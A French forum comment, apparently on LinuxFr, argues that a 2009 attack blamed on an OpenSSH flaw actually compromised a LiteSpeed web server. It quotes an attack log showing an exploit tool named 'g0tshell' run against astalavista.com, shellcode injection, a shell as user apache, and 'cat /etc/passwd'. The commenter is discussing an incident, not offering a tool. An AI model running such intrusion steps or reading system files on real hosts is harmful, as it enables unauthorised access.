• [^] # Re: Un rapport avec ceci?

    Posté par (site web personnel) . En réponse au journal Faille OpenSSH : qu'une rumeur mais.... Évalué à 2.

    L'attaque dont je parlais (dont tout le monde s'est mis à parler le 6 juin) commence comme ça :

    anti-sec:~# ./g0tshell astalavista.com -p 80
    [+] Connecting to astalavista.com:80
    [+] Grabbing banner...
    LiteSpeed
    [+] Injecting shellcode...
    [-] Wait for it

    [~] We g0tshell
    uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
    ID: uid=100(apache) gid=500(apache) groups=500(apache)

    sh-3.2$ cat /etc/passwd
    (...)

    C'est le serveur web (LiteSpeed) qui a été craqué (il s'exécutait en tant qu'utilisateur nommé « apache » ce qui porte à confusion).

    Source : cache Google, car l'original a disparu (comme prévu) : http://209.85.135.132/search?q=cache:mA8d4EnYvj8J:pastebin.c(...)